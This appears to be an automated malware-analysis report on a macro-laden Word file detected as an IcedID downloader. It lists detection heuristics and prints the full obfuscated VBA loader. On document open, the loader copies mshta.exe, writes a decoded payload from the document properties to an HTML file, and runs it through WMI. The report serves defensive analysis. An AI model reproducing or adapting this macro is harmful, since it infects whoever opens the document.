MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(aSLsc2).create (aR2aD) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13289 bytes |
SHA-256: 9ec18f55769278f370182ac5ecb7687181b16af4ddaa5e2893bdc73dfa0c3ce8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aZvQ72"
Function aogb8(aGN4Yp)
' Limitless chan
' Corsican institutes motorola
' Meddling sublime halloween outdone bilious
' Abstractions fiasco
' Taciturn ken
' Pittsburgh sr mediterranean furtherance
' Civic cohen awkwardness ll
' Weights printable sid buttocks
' Edgar subjective tyler altered
' Infant cask rosa
' Doggedly esoteric
aksiq = aGN4Yp
aoRaVy = Len(aksiq)
For aJUNPF = 0 To aoRaVy - 1
' Solutions obviate glow latina
' Veteran
' Celt studious
' Suggestions lugger antiquated training intersect
' Ducal mats trestle
' Perugia lighting sapphire
' Honors mobile paid
' Pound middling meddlesome oil
' Read hostel purchasing switched
' Understanding
' Produced ge permission intractable
aTRtB = aTRtB & Mid(aksiq, (aoRaVy - aJUNPF), 1)
Next aJUNPF
aogb8 = aTRtB
End Function
Public Function a6c8rA(a5A2n)
a6c8rA = Replace(a5A2n, aKwk3A, "")
End Function
Sub AutoOpen()
' Intangible strange
aAhVs
End Sub
Attribute VB_Name = "azZr8C"
Public Const ajVTDf As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const aKwk3A As String = ")"
Public Const aDd4Z5 As Integer = 925 - 912
Function asIgnU()
End Function
Sub a8aO2(aDUpi)
' Otter jaunt extermination zip groundwork
' Quizzical thrown intermediate afflict passed
' Church uh immigration
' Families
' Ci armoury enacting
' Assignment gradually
' Steppe undisciplined ons guys
' Ogre culminated irrelevant
' Evade remarkable spurn vg aquiline
' Cassock typically intense
' Zee restored tit smirk classifieds observations
' Sally shorts
' Joan purchase docility
' Hark arena
' Movies friesland effulgent
' Antiquary
' Sets restructuring indianapolis
' Inferno validity
' Rebel
' Suddenly snorted
' Lars controls nigeria trinidad tier cod
' Shorn telecom rewritten newcastle
' Writer introduces sen
' Conventual writings rating butts abortion
' Midnight tangible complement
' Detestation batch
' Imprison compression
' Copying kennedy
' Isa group
' Democratic
' Belied porcupine fib reflective
' Jacket episode facial chary
' Opportune mysterious
' Protege drive abstaining information
' Libraries bourgeoisie lobby highways analytical
' Deadlock husbandman
' Hurrah inferiority supervisors manse straightforward
' Tacked million
' Oldest domineering junk
' Event
' Focuses knell wilderness
' Giuseppe
' Sarah duet materials
' Norse minimize cities
' Cio voluble roe mali chase
' Upheaval copyist
' Trolley dee
' Doom punctilious invest swarthy ww circles
' Disease
' Alienate deemed fully aberration
' Enamel transaction world
' Correlated peck
' Ladle watson huddle assigned
' Loot goto else
' Phases bewilder chalice
' Acclamations planes
' Avi atlas trickle statements
' Subtlety anticipated infinitesimal opprobrious www groups
' Porpoise wrapper inquisitiveness alternate
' Unfavourable
' Twitter villages randy deciduous grumble
' Crew spike
' Increase
' Atrocity
' Stationery
' Russell sitemap idioms lm cities
' Defensible insistence drove cleaning ericsson circumstances
' Liz narrative oracular
' Dress
' Trend sinewy
' Squalid adviser improvise wigwam colin hope
' Protocols adjust ranging of
' Adoring contrition genealogy
' Criterion hatter execute mains
' Tx
' Condo pave nutten
' Eulogium motherhood pitiable event whomsoever
End Sub
Function aqMVHD(alpORU)
' Runner register yugoslavia
aqMVHD = ActiveDocument.BuiltInDocumentProperties(alpORU)
End Function
Public Sub aJBE0()
If -418 + 482 < 228 Then
Call aOyT2
End If
End Sub
Public Sub aWNbiM()
If -418 + 482 < 228 Then
Call aIO8w
End If
End Sub
Attribute VB_Name = "asaYK"
Public Function adPVE(aVTnkv, axSCWy)
' Georgian
' Membership elation partners statutes scrawled
' Whales overhaul vivacious venues
' Inventory diary
' Pigeon denver fingers hunger
' Spleen roland
' Giraffe reasons cyber informal blazoned
' Scarecrow frontpage
' Ebooks thereunto canvas cripple
' Postmark leicestershire
' Repeat beautify
' Lottery epitome something
' Roseate ks semicircular
' Flimsy air files downtown
' Copyrighted yachts
' Simultaneous ha python
' Christina
' Conscripts annotation
' Residents clusters functional
' Duffer lp
' Docs queue
' Notes fix hesitancy receptors castaway
' Allure amanda blackguard diagram
' Hoary succor prefixed trellis paperbacks
' Anthology forty-three alf years beehive apt
' Matting
' Additional metamorphosis curvature
' Lars correlation parameters spiritual
' Quell stitch lusitania provides tableaux
' Adjustment
' Eruption heidi allan
FileNumber = FreeFile
Open aVTnkv For Output As #FileNumber
' Feasible padlock communism closely
' Denounce islam
' Weedy des swirling permissible grenada
' Telephony exeter hip lincolnshire abolitionists
' Figure respiratory connective
' Mechanics micah paid
' Spokesman wagon
' Wearisome declination band hydra
' Fbi northeast theoretically natalie
' But
' Envelope
' Greek hobart establish
' Mixing tattooed mc
' Tamil allurement jimmy
' Thereabout compatibility contraction
' Fully sa
' Dollar nuclear
' Watts holster undecided tropic
' Said worship enlargement moira paths
' Forward
' Phases composite absent
Print #FileNumber, axSCWy
Close #FileNumber
End Function
Sub ax7BC(aYf20, acO0iY)
' Afflict
' Expansys relying revenge anchorage stubble largest
' Hallowed toga chubby scan
' Scudding preference globe evenly homepage
' Blake 555 revolting capabilities paxil identity
' Nome entirely
' Dover bygone streams opinion literacy mac peat
' Hammock gps tell browsing
' Realistic pew extradition absence
' Jonathan lurch
' Zigzag telephone roulette
' Valuation
' Republic iceland alkali
' Hip stats stereo notebook euripides
' Painted ideas displace
' Horrible inflammation
' Pod smelting
' Epic determines
' Son towing helicopter password
' Briefly vista
' Constitute comp scabbard brawny
' Unfriendly claret vats understanding digestive
' Intuitive ointment
' Alarm casket pb xerxes
FileCopy aYf20, acO0iY
End Sub
Function aEpcz(aogwKz)
aEpcz = aogwKz
End Function
Attribute VB_Name = "ahSsy"
Sub aAhVs()
aJBE0
' Championships triple
' Loudness mixed alex fraud
' Shower juice inserted geologist saturday gaudy
' Unpopular arabia
' Dauphin revealed matrix
' Elliott millions
' Beaux basement funding restriction ho cholesterol
' Georgian doggedly ideal msgstr
' Norwegian qualifying moves
' Total dais liz
' Extraordinary insistence quicksilver
aWNbiM
' Sail camcorder unconventional commodities
' Erudition flashers
' Mel hearths mindful
' Saint mechanisms grouse bicycle gymnastic
' Acquirement f lite
' Arcade sucks
' Performer wizard
' Skating disclaimed choral den detract
' Myself instrumental living democritus lexmark
' Wigwam sulky neo
' Overcast wn
' Fantasy hard concepts immobile
' Dividend
' Circular benz nude promoter amiability
' Hard-headed medicaid kidnapping fp glaze machinist
' Postal dispel
' Clifton parasite
' Supplement festivals sucked superstructure seneca parts belie
' Assured ones microwave bulbous cumbersome
' Tits anatomy
' Orpheus
' Atop legally capabilities
' Descriptive genome
' Venom overseas phone rss
' Jacky minx recipient
' Continuity promenade coll
' Ids startup browser
' Inquisitively odd bid zurich chafe
' Dw lotus medicine layers
' Slum incite mc fatuous
' Raven part category creator documented
' Upside urw quantity guatemala ours
' Beverages epilogue cms befit convenience filling
' Shaving hardcover traditionally
' Scared squad routine
' Mosquitoes intermediate
' Wav trickle express hungarian
' Aqueous slipper receives wren
' Ill-advised
' Pelt rush suppose controlled teach separation neptune
' Extraction modem awful
' Candidates thumbs caller incorporate caps
aSLsc2 = a6c8rA(aogb8(ajVTDf))
CreateObject(aSLsc2).create (aR2aD)
End Sub
Attribute VB_Name = "aX8JzP"
Function agURh1()
agURh1 = VBA.Split(aogb8("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function ab0Xiq(aTn59)
aTvyU = agURh1()
' Circus lorenz burly time
' Cheapest
' Robin
' Accords beach succumb decrease harvest
' Rudolph forego atmosphere lucas
' Hungarian arousing throb serial
' Cull tablet budapest acquirement faultless needed
' Worshipping nakedness retrospective snowboard
' Vg ste. alerts gay skating asian
' Presidential tenets suspension aggregation
' Interests pseudonym nba
' Tornado founded irksome
Select Case aTn59
' Ups jelsoft
Case 0:
' Evacuate periodically forty-three
ab0Xiq = aTvyU(1)
Case 1:
ab0Xiq = aTvyU(2)
' Middling denomination
' Unblemished insurance bugle himalayas full
' Divx tut suite
' Valuables
' Line experts watershed phones newest
' Reciprocate fight week radiate column da
' Nubia welkin cree
' Chirp regime sanskrit horse
' Breakwater larry fiat ball
' Real
' Basketball nicaragua serenade
Case 2:
' Capriciously mutilation stiffen suffer algeria
' Absence listed
' Revenues infidel glade
' Holocaust afterthought rrp contributors
' Mother-in-law mysql
' Stroke constitute
' Scoff yawned
' Piecemeal assist profits
' Preserve
' Although
' Using chimerical christ
ab0Xiq = aTvyU(3)
End Select
End Function
Sub aIO8w()
aboJx = ayLs7U(ab0Xiq(2))
adPVE aboJx, aWOhru(aqMVHD("comments"))
End Sub
Attribute VB_Name = "aBRdo1"
Function aD9mE(abZvT9)
' Wildfire soonest respondent
aD9mE = a6c8rA(abZvT9)
End Function
Function as8Y5(aw6f13)
' Dude lender
as8Y5 = (a6c8rA(aw6f13))
End Function
Function ayLs7U(ajE5oi)
ayLs7U = (a6c8rA(ajE5oi))
End Function
Function aR2aD()
abhpE = as8Y5(ab0Xiq(1))
ayLgAt = ayLs7U(ab0Xiq(2))
aR2aD = abhpE & " " & ayLgAt
End Function
Sub aOyT2()
aI1hBK = aD9mE(ab0Xiq(0))
abhpE = as8Y5(ab0Xiq(1))
ax7BC aI1hBK, abhpE
End Sub
Function anXqy2(a8FEn)
anXqy2 = a8FEn + -82 + 108
End Function
Function akqfE(a3sZD)
If a3sZD = 0 Then
akqfE = 12995 / 12995
' Profession strings unlikely beliefs
' Optimal refugees grades
' Custom vampire productivity
' Mounting witch popularity thistle
' Conducts genres operates
' Stephen able
' Shops turbid aquiline diminutive updating hosea capitulation
' Safe opportunities fertilized playboy
' Lighten demarcation
' Between
' Bolting matched
' Contracting queenly
' Carlo asses consultation
' Aniline pedagogue
' Outlined marianne serenade
' Loam sunstroke bones orientation
' Purge long-winded furlong messenger restaurants brass
' Soulless cute potency
' Fibre three-cornered usurper ntsc make
' Blouse knowledge
' Misconduct healthful fornication rhythm nw
' Magnify zigzag rape
' Avidity
' Wag pantheism inactivity
' Loathsome reflective testing
ElseIf a3sZD = 5 Then
akqfE = -85 + 182
Else
akqfE = 512 * 2
End If
End Function
Function aqzNgM(a8FEn, aDxH7w)
aqzNgM = a8FEn - aDxH7w
End Function
Function aRlZ0N(a8FEn)
aRlZ0N = Chr(a8FEn)
End Function
Attribute VB_Name = "aFpqN9"
Function aWOhru(aoEM2) As String
Dim a9uUT6 As Long
Dim anTj2 As Integer
Dim aHVXR9 As Integer
For a9uUT6 = 1 To VBA.Len(aoEM2) Step 1
aHVXR9 = 0
aflCM1 = Mid(aoEM2, a9uUT6, 1)
anTj2 = Asc(aflCM1)
' Prepared agog creeper justice
' Maui aroma seller roma authority
' Sin benefit
' Gravitation goes debris
' Snail proc inexorably lid centurion
' Overt attempt saint litany
' Harried inserting
' Semester rides
' Na sexcam canvassing impetuosity dido
' Analyze freely quilt
' Slum potato
' Gild trumpeter
' Luxury passed employ
' Tons raise
' Nextel fireplace
' Lustful masque primate mecca fustian cooking sound
' Arcadian quantum
' Floral syntax predicate chose searching
' Nugget relationship stupid
' Treo rice exuberance risks tracked
' Safe-conduct mu
' Plaza wallace unseemly autocratic
' Lasting mysterious ef wallow qua
' Amaryllis thumbnails dicks
' Goods lyrics v
' Chronicle pension sale dui dollars
' Prohibited windpipe anachronism warrior
' Forty-eight monty ha claim
' Hale effigy
' Switch hub mother accuracy
' Cosmetics philanthropic
' Dies rides
' Fatherless precipitation
If (anTj2 > 64 And anTj2 < 91) Or (anTj2 > 96 And anTj2 < 123) Then
' Glen romeo civilian generally sacrament
aHVXR9 = aDd4Z5
' Goth.
' Sucks bygones v putty
' Without influenza expedite lurch
' Scenes intrust arrangement transvaal tumble
' Boc discussed searched appreciative terrain
' Lip palisades advertisement verification
' Drop combated testator sp tee sh
' Governing keen
' Landward pa relationship retrograde
' Baize flounder evasively
' Fertilized playwright
anTj2 = aqzNgM(anTj2, aHVXR9)
If anTj2 < akqfE(5) And anTj2 > 83 Then
anTj2 = anXqy2(anTj2)
ElseIf anTj2 < -231 + 296 Then
anTj2 = anXqy2(anTj2)
End If
End If
' Adams doctor
agjS41 = aRlZ0N(anTj2)
Mid$(aoEM2, a9uUT6, 1) = aEpcz(agjS41)
Next
aWOhru = aoEM2
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 53760 bytes |
SHA-256: 3253a4ffe63ac2c7f6995fb51d696fbd1a0aed199a853014511ba68588f4d405 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.